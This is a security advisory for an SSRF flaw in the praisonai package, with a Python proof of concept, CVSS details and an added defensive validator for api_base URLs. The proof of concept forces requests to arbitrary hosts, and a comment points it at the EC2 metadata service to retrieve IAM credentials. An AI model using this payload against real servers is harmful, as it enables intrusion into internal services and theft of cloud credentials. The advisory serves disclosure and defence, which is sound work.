CVE-2026-34936

GHSA-x6m9-gxvr-7jpv HIGH
Published April 1, 2026

### Summary

`passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP...

Affected Systems

| Package   | Ecosystem | Vulnerable Range | Patched |
|-----------|-----------|------------------|---------|
| praisonai | pip       | <= 4.5.89        | 4.5.90  |

Severity & Risk

CVSS 3.1
7.7 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
N/A

Recommended Action

Patch available

Update praisonai to version 4.5.90

Technical Details

NVD Description

### Summary

`passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.

### Details

`passthrough.py:92` (source) -> `passthrough.py:109` (fallback trigger) -> `passthrough.py:110` (sink)

```python
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):

    # fallback trigger -- AttributeError from unrecognised provider enters fallback
    except AttributeError:
        url = f"{api_base or 'https://api.openai.com'}{endpoint}"

        # sink -- no validation before request
        response = client.request(method, url=url, ...)
```

### PoC

```python
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm

sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route
from praisonai.capabilities.passthrough import passthrough

result = passthrough(
    endpoint="/ssrf-test",
    api_base="http://127.0.0.1:8888",
    method="GET",
    custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials
```

### Impact

On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with `AUTH_ENABLED = False` by default, making this reachable over the network without credentials.
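The check the advisory describes as missing, written out as an added defensive example (not praisonai's code and not the 4.5.90 fix): a `validate_api_base()` helper that enforces the scheme allowlist, an optional host allowlist and non-public address filtering before the concatenated URL reaches `httpx`. The function names and the DNS lookup table are constructed, and the resolver is injectable so the check can be exercised offline.

```python
"""Hardened api_base/endpoint handling for the passthrough fallback.
Added example, not praisonai's code: names and the DNS table below are constructed."""
import ipaddress
import socket
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}

def _is_blocked(ip):
    """True when ip is not globally routable: loopback, RFC 1918, link-local
    (169.254.169.254), ULA, unspecified, multicast, reserved. IPv4-mapped IPv6
    literals are unwrapped first so ::ffff:127.0.0.1 is judged as 127.0.0.1."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global

def validate_api_base(api_base, endpoint, allowed_hosts=None, resolver=socket.getaddrinfo):
    """Return the full request URL, or raise ValueError if api_base is unsafe.
    resolver is injectable so the check can be exercised without real DNS."""
    parts = urlsplit(api_base)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host or parts.username or parts.password:
        raise ValueError("api_base must be scheme://host[:port] without credentials")
    if allowed_hosts is not None and host not in {h.lower() for h in allowed_hosts}:
        raise ValueError(f"host not in allowlist: {host!r}")
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP in the URL
    except ValueError:
        try:  # hostname: every address it resolves to must pass, not only the first
            infos = resolver(host, parts.port or (443 if scheme == "https" else 80))
        except OSError as exc:
            raise ValueError(f"cannot resolve {host!r}") from exc
        addrs = [ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos]
    for ip in addrs:
        if _is_blocked(ip):
            raise ValueError(f"{host!r} resolves to non-public address {ip}")
    if not endpoint.startswith("/") or endpoint.startswith("//"):
        raise ValueError("endpoint must be a single absolute path")
    return urlunsplit((scheme, parts.netloc, parts.path.rstrip("/"), "", "")) + endpoint

# Constructed DNS table standing in for socket.getaddrinfo in offline tests.
_FAKE_DNS = {"api.openai.com": ["93.184.216.34"], "gateway.internal": ["10.0.0.5"],
             "localhost": ["127.0.0.1"]}

def fake_resolver(host, port, *_):
    if host not in _FAKE_DNS:
        raise socket.gaierror(f"unknown host {host!r}")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (a, port)) for a in _FAKE_DNS[host]]
```

Resolving the name and checking every returned address closes the case where a public-looking hostname points at an internal address; a DNS answer that changes between this check and the actual connection (rebinding) still needs to be handled at the HTTP client or egress layer.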

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026